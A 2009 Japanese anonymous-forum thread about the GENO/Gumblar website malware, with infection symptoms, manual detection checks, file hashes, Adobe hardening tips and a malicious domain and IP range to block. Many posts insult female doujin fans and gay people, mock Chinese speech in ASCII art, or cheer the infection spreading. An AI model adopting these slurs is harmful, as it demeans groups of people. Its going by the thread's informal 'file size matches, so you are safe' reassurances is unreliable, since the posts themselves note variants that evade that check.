1 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:17:40 ] ・sqlsodbc.chmを改変 ・cmd.exe、regedit.exeが起動不能 ・一部のアンチウイルスソフトが更新不能 ・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト) ・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集 ・Googleの検索結果を改竄(リンクを弄る) ・explorer.exeや一部のブラウザが異常終了 ・Acrobatが勝手に起動 ・PDFファイルやシステムファイルが増殖 ・CPU、メモリ使用率がUP ・再起動時にBSOD 感染が疑わしい人は迷わずクリーンインストール推奨です。 ★Anubisレポート anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html ★GENOウイルスまとめ ttp://www29.atwiki.jp/geno/ ★このサイトは諸事情により内容を書き換え ttp://www3.atword.jp/gnome/ 前スレ GENOウイルススレ ★7 pc11.2ch.net/test/read.cgi/sec/1242465121/
2 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:18:12 ] KINGは業界団体に入ってない単なるジョークソフト internet.watch.impress.co.jp/cda/news/2008/02/05/18360.html ALWIL Software AV-Comparatives AV-Test.org AVG Technologies Avira GmbH Bit9 BitDefender Doctor Web, Ltd. ESET F-Secure Corporation G DATA Software Hispasec Sistemas International Business Machines Corporation Kaspersky Lab McAfee, Inc. Microsoft Corp. Norman ASA Panda Security PC Tools Sana Security Secure Computing Sophos Plc Symantec Corporation Trend Micro Incorporated Virusbuster Ltd.
3 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:18:44 ] また腐女子か。 キモイから規制しろ
4 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:19:03 ] 関連スレ 【管理も】同人サイト・GENOウィルス注意3【閲覧も】 changi.2ch.net/test/read.cgi/doujin/1242466997/ GENOウイルススレ pc11.2ch.net/test/read.cgi/internet/1242450264/
5 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:19:23 ] 409 名前:geno[sage] 投稿日:2009/05/16(土) 21:18:55 ID:UNJfTOVM0 セキュリティー板じゃ同人騒ぎすぎとか言ってるが、 サイト管理人にしてみたら自分が配布元になりかねないんだから 信用問題だと思った ・・・が言えなかった。
6 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:20:07 ] ★過去スレ GENOウイルススレ ★7 pc11.2ch.net/test/read.cgi/sec/1242465121/ GENOウイルススレ ★5(★6) pc11.2ch.net/test/read.cgi/sec/1242415108/ GENOウイルススレ ★5 pc11.2ch.net/test/read.cgi/sec/1242415022/ GENOウイルススレ ★4 pc11.2ch.net/test/read.cgi/sec/1242363241/ GENOウイルススレ ★3 pc11.2ch.net/test/read.cgi/sec/1240853183/ GENOウイルススレ ★2 pc11.2ch.net/test/read.cgi/sec/1239364066/ GENOウイルススレ pc11.2ch.net/test/read.cgi/sec/1239152979/
7 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:20:14 ] 409 名前:geno[sage] 投稿日:2009/05/16(土) 21:18:55 ID:UNJfTOVM0 セキュリティー板じゃ同人騒ぎすぎとか言ってるが、 サイト管理人にしてみたら自分が配布元になりかねないんだから 信用問題だと思った ・・・が言えなかった。
8 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:20:18 ] 結局次スレたったんだな
9 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:20:25 ] >>1 乙 前スレ>>997 その両者だったらばかなやつの方がマシだろ
10 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:20:41 ] 腐女子は巣に帰ってください。セキュ板からのお願いです
11 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:20:42 ] >>1 乙 同人サイトの方はまずこちらを見て下さい 【管理も】同人サイト・GENOウィルス注意3【閲覧も】 changi.2ch.net/test/read.cgi/doujin/1242466997/ 同人スレの方のまとめより、まとめ見ても全然分からないって人は とりあえずこれだけはやっとけ、自分でサイト持ってない人はとりあえずは何もしなくてよし >最低限やるべきこと >あなたがサイト管理者である場合、自サイトのソースをチェックし ></head>と<body>の間に入れた覚えのないjavascriptのコードが入ってるか確認してください。 >入っている場合はウィルスに感染しています。 >感染を広げないため、一刻も早くサイトを削除してください。
12 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:20:48 ] >>●365日、毎日9:00〜24:00まで対応! (#`ハ´)答えは全て「サイインストールスル アル」 >>●パソコン、メール、周辺機器などの面倒な設定、変更をサポート! (#`ハ´)VB不具合無いアル、不具合周辺機器せいアル。周辺機器メーカーへ問い合わせるアル >>●パソコン、メール、インターネット関連のトラブルに対応! (#`ハ´)VB不具合無いアル、お使いのパソコンメーカー、プロバイダーに問い合わせるアル >>●パソコン、アプリケーション、周辺機器など基本的な操作方法をサポート! (#`ハ´)VB不具合無いアルから、お使いのパソコンメーカーに問い合わせるアル >>●ハードウェアの故障の場合は、トラブルを切り分けし、メーカサポートをご案内 (#`ハ´)切り分ける能力無いアル。VB不具合全部ハードのせいアルネ >>●電話でわからない場合は、リモート(遠隔操作)で対応も!!で解決!! (#`ハ´)msconfigでスタートアップ・サービス全止め→再起動、なおらなければサイインストール アル
13 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:20:59 ] 感染予防対策 1.Adobe Flash Player の最新版にアップデート 2.Adobe Acrobat Reader の最新版にアップデート 3.NoScriptの導入(Firefoxの導入) 4.Adobe Acrobat Readerの JavaScript 機能OFF 5.危険IPのブロック 諸事情でAdobe Reader 最新版を使わざるを得ない場合 2009年4月29日現在の最新版バージョン9.1設定例 1.Adobe Readerを起動し「編集」メニューの「環境設定」 「Acrobat JavaScriptを使用」のチェックボックスをオフ(チェックを外す) OKを押して設定確定後、Adobe Readerを終了。 ↓ 2.必要と好みに応じて Adobe Reader Speed-Up にてプラグインを整理 設定は SpeedUp - Fast がおすすめ。 注意すべきは Acroform(拡張子なし) Annotations(拡張子なし) これら2つのチェックボックスをオン(チェックが入っている)状態にしておく必要がある。 そうしないと Adobe Reader が起動しなかったりする。 このとき追加作業として EScript.apiとEScript.JPNのチェックボックスをオフ(チェックを外す)状態にしておくと より安心かもしれない。 以下はお約束 上に書いたことを行えば安全という保証はなく、すべて自己責任でお願いします。 またAdobe Reader以外の環境設定をどうするかも各自考える必要があります。
14 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:21:00 ] 雑談スレなんてイラネ
15 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:21:42 ] 腐女子って本当ネチネチしてんだな マジクズ
16 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:22:15 ] >>1 乙
17 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:22:26 ] 【感染の確認方法】 @cmd.exe(コマンドプロント)、regedit.exe(レジストリエディタ)が起動するか確認する ※このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。 ■確認方法 1.スタートから「ファイル名を指定して実行」 2.「ファイルを指定して実行」という画面が出てくるので、入力欄に 「regedit.exe」と入力して「OK」ボタンを押す。 ※立ち上がったことを確認したら弄らず閉じること。 3.同様に、「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す ※立ち上がったことを確認したらAへ Asqlsodbc.chmのファイルサイズの確認を確認する ■Windows XP: 改ざんされていなければ C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes ■Windows 2000: そもそも存在しないはずなので、 C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。 ■確認方法 1.スタートから「ファイル名を指定して実行」 2.「ファイルを指定して実行」という画面が出てくるので、入力欄に 「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す →背景が黒いウィンドウが開いた場合3へ →起動しない場合:感染疑い濃厚 3.背景が黒いウィンドウを選択。 小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー Bavast!(無料のアンチウイルスソフト)で確認
18 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:22:32 ] >>9 しつもんする→わかんない 無限ループ
19 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:22:43 ] 前スレが腐スレヲチで終わってるんだが
20 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:22:50 ] お前らほんとに腐女子好きなんだなw
21 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:22:53 ] ⊂二 ̄⌒\ シェシェ〜 )\ ヽ ニーーハォ!! /__ ) ∧∧ ノ) //// /|. / 華 \ / \ ワタシ嘘大っ嫌いアルヨ!! / / / //\ \( `ハ´ ) _/ /^\) / / / (/ ヽ、 ⌒ ̄_/ ( ( (/ ノ T M / ̄ みなさん今日は大変うれしいおしらせアルヨ〜!! ./ / このチャンス逃したら一生後悔するアルネ!! |\ / ̄ ̄ ̄  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ | なんと!あの!国民的大人気サクサク快適安心ソフト、ウイルスバスターが | 只今、無料で2カ月延長利用できるキャンペーンアルヨ〜!!! \________________________________
22 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:22:53 ] とりあえずGENOの思惑は腐女子によってかなえられそうだな 次スレイランのでは?
23 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:23:12 ] ドメインとIP変わったっぽいから弾いてる奴は注意な martuz.cn 95.129.144.0/23 (95.129.144.0-95.129.145.255)
24 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:23:41 ] GENO亜種が猛威振るってるな いいぞもっとやれ
25 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:23:46 ] 正常なsqlsodbc.chm ファイルサイズ:50,727バイト CRC32:B61C7A80 MD5:F639AFDE02547603A3D3930EE4BF8C12 SHA-1:FBDD32ED13D27E4102621E1067FDF3634F33B2C3
26 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:24:00 ] >>20 セキュ板はツンデレが多いですから
27 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:24:09 ] 前スレがスレッドランキングに載ったぞw セキュ板だとAVGの日本語化以来かな
28 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:24:27 ] ゴキ腐リは嫌だ 可愛いおにゃのこがいいお
29 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:24:34 ] 現在拡散している Gumblar.cn zlkonの亜種ですが以下のような特徴を持っています。 インジェクションコードが難解になった バージョンチェックをユーザ側で行うため、サーバスクリプトの検出を回避している ※一部のIDSはサーバスクリプトへのクエリを監視しており、クライアント側でやられても判断できない 感染が容易と思われるPC環境をよりピンポイントに判断している(このため、セキュ各社の自動検出が難しくなっている) 感染しない環境には何も返さない(更に検証が難しい) 亜種の「更新」の頻度が異常にすばやく、亜種がほとんどのセキュソフトを潜り抜けているので、シグネーチャ・ベースでの検出が難しい ※検出率が上がる頃には次の種類になっている 感染の疑いがある場合 XP / 2000 の方は sqlsodbc.chm をチェックしてください。 ※sqlsodbc.chmを使わない亜種の存在が確認されていますので、この方法に完全に頼るのは危険かもしれません。 ttp://www3.atword.jp/gnome/zlkon-gumblar-%E5%95%8F%E9%A1%8C%E3%81%AB%E9%96%A2%E3%81%97%E3%81%A6/
30 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:24:36 ] 情報が欲しい奴は同人板に行ったほうが良い 機能してるのはあっちのスレだ
31 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:24:37 ] こんなレベルの奴らに何言っても無駄だろ ゆとり並に理解力ない上に無駄に高いプライドとかもう勝手に死んでくれと言うほかない 1 名前:自治 ◆mXx5gfarvs [] 投稿日:2009/05/09(土) 22:58:13 ID:apD2m+Ke0 同人板の自治スレです。 前スレ 【議論中】自治スレ 21@同人板 changi.2ch.net/test/read.cgi/doujin/1237720615/ 【緊急!現在ウィルス爆撃被害中。怪しいファイルをダウンロードしない等の自衛に努めて下さい】 ★ウイルス関係まとめサイト★ life.45.kg/sec/for_doujin.html www9.atwiki.jp/doujin-m/ life.45.kg/sec/ 【現状】 ▲現在同人板を爆撃しているウィルス ・スレッド内のレスをランダムコピペ。直前の書き込みにレスをつけたり、 トリップをつけたりするものもあります。 ・970を過ぎたスレを埋め立てるウイルスもいます ・ウイルスとの区別のために名前欄に「自治#自治」入力推奨 【感染すると?】 ・ウイルス混入のファイル実行で感染 (スレ見ただけでは感染しないからおちけつ) ・ウィルス感染者は、同人板閲覧者や2ch閲覧者とは限りません ・専ブラによるあぼーん機能の使用推奨 ・感染すると自分の知らない間に、爆撃対象のスレに連続コピペ投下 ・爆撃を果たしたIDは管理側にIPを割り出され、BBQに焼かれて書き込めなくなります ※現在は共有IPでも焼かれているので、巻き込まれる・巻き込む可能性もあります
32 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:24:45 ] _.. -――- ._ ./ ,―――‐- ._` . /) ./ / / ``\ ///)ィ7T.フ厂 ̄`フi ‐-_ |〉. _人人人人人人人人人人人人人人_ /,.=゙''"/ フl/_×// |ハハl .ト、> キャッシュ削除すればいいんだよ!!< / i f ,.r='"-‐'つイ._T_i` .r≦lハ!|`` ^^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^ ̄ / / _,.-‐'~| |'弋..!ノ i'+!l | / ,i ,二ニ⊃l |' ' ' ,‐- ..__゙ー' .!l .| / ノ i l゙フ..,!l .ト、 l `,! .ハ.! ,イ「ト、 ,! ,!|.../_| |l: > .ヽ.. ィ <l l| / iトヾヽ_/ ィ"\. | | \ \ー'/ ./ ,,;:`:;'゙
33 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:24:54 ] >>27 マジ? 久しぶりだな
34 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:25:04 ] 確かに同人板の方がウイルスの話してるなw
35 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:25:10 ] >>31 同意 もうなんか色々呆れた
36 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:25:38 ] ___ / \ / ⌒ ⌒\ / ,(⌒) (⌒)、\ | /// (__人__)/// | 日本製だってお \ ` ヽ_ノ / ヽ , __ , イ / |_"____ | l.. /l´産地偽装 `l ヽ 丶-.,/ |________._| /`ー、_ノ /バスター / ...2009/
37 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:25:42 ] 正常なsqlsodbc.chm ファイルサイズ:50,727バイト CRC32:B61C7A80 MD5:F639AFDE02547603A3D3930EE4BF8C12 SHA-1:FBDD32ED13D27E4102621E1067FDF3634F33B2C3 PC初心者なんでCRC32.MD5.SHA-1ってのがよく分からんのだが サイズは丁度同じだった。 感染してないとみて大丈夫そうでしょうか? お願いします。
38 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:25:45 ] >>27 起動酎スキャンのAVGか
39 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:25:46 ] 男ツンデレなんていらねーよw おまえら単に女の子との接し方しらないだけろ。 好きな子にイジワルする小学生から成長してないセキュ住民ワロス
40 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:25:47 ] >>23 おk
41 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:25:52 ] 腐女子が勝手に押しかけてきて荒らしていったスレ おまけに粘着腐女子は未だ健在
42 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:25:58 ] 踏んでしまったらしくIEがネットに繋がらなくなった 今はサブ機で2chしてる、cmdとかregeditは使える。 Windows XP用ネットワーク診断ツールの結果 前回の診断実行時刻: 05/16/09 21:23:13 ネットワーク アダプタの診断 ネットワークの場所の検出 info ホーム インターネット接続を使用します ネットワーク アダプタの識別 error エラー 0x80070424: 指定されたサービスはインストールされたサービスとして存在しません。 HTTP、HTTPS、FTP の診断 HTTP、HTTPS、FTP の接続 warn HTTP: エラー 12007 (www.microsoft.com に接続中): The server name or address could not be resolved warn FTP (パッシブ): エラー 12007 (ftp.microsoft.com に接続中): The server name or address could not be resolved warn FTP (アクティブ): エラー 12007 (ftp.microsoft.com に接続中): The server name or address could not be resolved warn HTTP: エラー 12007 (www.hotmail.com に接続中): The server name or address could not be resolved warn HTTPS: エラー 12007 (www.microsoft.com に接続中): The server name or address could not be resolved warn HTTPS: エラー 12007 (www.passport.net に接続中): The server name or address could not be resolved error HTTP 接続ができませんでした。 error HTTPS 接続ができませんでした。 error FTP 接続ができませんでした。
43 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:26:01 ] -----------同人関係の方は以下スレにてお願いします------------- 【管理も】同人サイト・GENOウィルス注意3【閲覧も】 changi.2ch.net/test/read.cgi/doujin/1242466997/
44 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:26:53 ] このまま一般サイトに感染すれば面白いんだけどな
45 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:27:23 ] >>43 今はこっちが勝手に観察して ネタを張り付けてるやつがいるだけだろ
46 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:27:25 ] 腐女子腐女子言うやつらは向こう行って構ってもらえよ
47 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:27:26 ] >>44 してますけど
48 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:27:46 ] >>47 メシウマ!
49 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:27:47 ] 凄い進んでるが何か恐ろしい事でも起きたのか?
50 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:27:49 ] 法人サイトが感染しまくりでカオスな状況を楽しみたかったのに この騒ぎだと月曜までに認知度上がっちゃって、web管理者が対策しちゃいそうだな
51 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:27:53 ] >>37 とりあえずファイルサイズが一緒なら大丈夫だと思う
52 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:28:24 ] >>49 トレンドマイクロいよいよピンチ
53 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:28:30 ] 別にホモサイトが絶滅しても一向にかまわんよ
54 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:28:51 ] むしろ壊滅すればいいと思うよ
55 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:29:04 ] 30代40代のババアが「女の子」www
56 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:29:20 ] >>40 間違ってるかもしらんから自分でチェックよろ www3.atword.jp/gnome/
57 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:29:34 ] 腐女子はキモイだけじゃなく存在自体が邪魔だからな
58 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:29:43 ] ノートン先生と一緒に寝るお
59 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:30:04 ] 実際法人サイトはどの程度影響されてるんだ?
60 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:30:11 ] あぼんばっかり
61 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:30:21 ] バスターまた更新キタ 4GB
62 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:30:22 ] とりあえずAdobe Readerを削除すればいいんだな ずっと使ってないしうp立てもしてないし消してもいいや
63 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:30:24 ] あらゆる板から嫌悪されているのが腐女子 今ようやく理由が分かった気がする
64 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:30:25 ] つーか普通は一般サイトにウイルス蔓延してもちゃんと対策するだろ 情弱ゆとり腐のサイトがことごとく壊滅するだけ
65 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:30:26 ] おい同人サイト怖くていけなくなったじゃねえか オタク引退宣言だわ
66 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:30:41 ] >>49 ノートン先生が働いてくれない
67 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 21:30:45 ] >>37 MD5いっしょだから大丈夫だろ
68 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:31:28 ] あんだけ荒らしておいて謝罪なしとか腐女子マジキチ
69 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:32:11 ] あれ…朝見たとき5だったと思ったら なんかあったの?
70 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:32:17 ] むしろ暴れてたのはν速民な気が
71 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:32:19 ] >>49 マカフィー2010発売延期
72 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:32:49 ] 来なくて良い
73 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:32:58 ] >>68 ほとんどここの住民が勝手に騒いでただけじゃね
74 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:33:00 ] >>70 最初は腐板から勝手にリンクされて大量搬入された
75 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:33:12 ] >>69 腐と戯れるひととき
76 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:33:16 ] >>62 FlashPlayerも削除してくれ
77 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:33:16 ] >>66 いつも通りだけどな。 そういう意味では遅くても来週には落ち着く。 マイクロソフトのパッチも出るかもな。
78 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:33:19 ] >>49 ノートン先生が食中毒で運ばれた
79 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:33:42 ] 読者のみなさんにねらーだってバレるの嫌なので ウイルス注意喚起文はサイトに載せません^^
80 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:33:49 ] 人の多いwiki系のとこはヤバイんじゃね? リンクを感染サイトへの外部リンクに書き換えられまくったらアウト
81 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:34:08 ] >>73 いいからお前は巣に帰れよ 迷惑なんだ、マジで。
82 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:34:10 ] ノートン先生が15歳の美少女で処女だと判明した>49
83 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:34:22 ] ねらーって事より腐女子って事の方がよほど恥ずかしいと思う
84 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:34:39 ] 同人サイト以外にも同盟サイトなどにも感染してるみたいです ただ同人板にスレ立ってるおかげで同人サイトが目立っているようす
85 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 21:34:46 ] >>78 先生に比べると対策済みのVBは優秀だね
86 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:35:19 ] ウイルスにねらーも何もないんだけど さすがマジキチはレベルが違うな
87 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:35:32 ] vistaが最強であることが証明されたの?
88 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:35:33 ] >>83 確かにホモでハアハアしてるよりは ネラーの方がまだマシだな
89 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:35:51 ] >>85 台湾人特有の釣りですか?
90 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:36:07 ] >>69 ホモ同人が見れなくなって発狂した腐女子が大量に釣れた
91 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:36:13 ] 腐女子ってなんでくだらないプライド持ってるの?ゴキブリなの?
92 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:36:14 ] ウイルス対策ベンダーにとっても今回の件は頭が痛いんじゃないか 有料のノートンより個人使用に限り無償のavastが活躍してさ。 「なんだ無料のウイルス対策ソフトの方が優秀じゃね」という事に気が付いて。
93 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 21:36:18 ] >>87 operaもな
94 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:36:31 ] ああいう一部のキチ層がいるせいで同人の奴らが変な目で見られるんじゃないの ちゃんと正してやれよ仲間だろ
95 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:36:47 ] そもそも、すでに同人サイトだけの問題ってわけでもないからなあ MSも動いてくれなきゃ糞面倒な状況はかわらないし >>87 亜種が沢山あるから安心できないぜ
96 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:36:51 ] >>73 気持ち悪いな巣に帰れよゴミが
97 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:37:02 ] >>94 関わりたくないしお断りします
98 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:37:10 ] Adblockで*.cnと*.krのコンテンツをブロックしてたから全く気づかなかったわ
99 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:37:11 ] AVG><
100 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:37:13 ] 久しぶりにウイルスでギャーぎゃー言ってるから 山田ウイルスみたいなすっげーのかと思ったら腐女子がグェグェ大げさに騒いでただけだったのねん
101 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:37:21 ] >>92 目立たないだけで結構あるし、もちろん逆も多い。 流石に今回のはでかいけど。
102 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:37:26 ] vistaを売りたいゲイツの罠なのか
103 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 21:37:31 ] >>93 狐は
104 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:37:43 ] >>92 4月下旬にもう感染サイト弾いてくれてたからねavastは
105 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:37:54 ] IPの遮断ってどないすんねん
106 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:38:01 ] 同人と腐女子に過剰反応しすぎだろw
107 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:38:23 ] 荒れた原因ですから<腐女子
108 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:38:52 ] マジキチの話はもういいから
109 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:39:01 ] なんで、このスレ異常に速いの?
110 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:39:04 ] 小林製薬でも感染してお詫びしてるくらいなのに…
111 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:39:08 ] この件、もの凄い事実に気づいてしまった・・・・ まさかとは思ったけど、なんかアレだな
112 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:39:27 ] >>106 もういいから来るなよ ホモでハアハアしてな ここを荒らすな
113 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:39:35 ] 親父がよくニフあたりのFlashゲーやってるから不安だなぁ
114 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:39:48 ] GENOもまさか殺害予告出されるとは思わなかったろうな
115 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:40:01 ] カスペおじさんキレるよ?
116 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:40:42 ] まさか同人同人騒いで無かったことにしようとしてるんじゃ ないよね GENOさん
117 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:41:37 ] 腐サイト全滅すれば良いのにな
118 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 21:41:38 ] GENO「や ら な い か?」
119 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 21:41:43 ] IPのブロックってどないすんねん
120 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:42:07 ] またいらんところで敵を作った腐女子であった
121 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:42:16 ] GENOウイルスなんてVB入れてれば全然怖くないよ
122 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:42:18 ] お前ら言いすぎwwwwwwwwww とも思ったが向こう見てると確かにひどいwwww バカ多すぐるwwwwwwwww だから大流行してんだろうな、同人サイトでwwwwwwwwww
123 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:42:33 ] 俺がGENOだあああああああ!!!!!
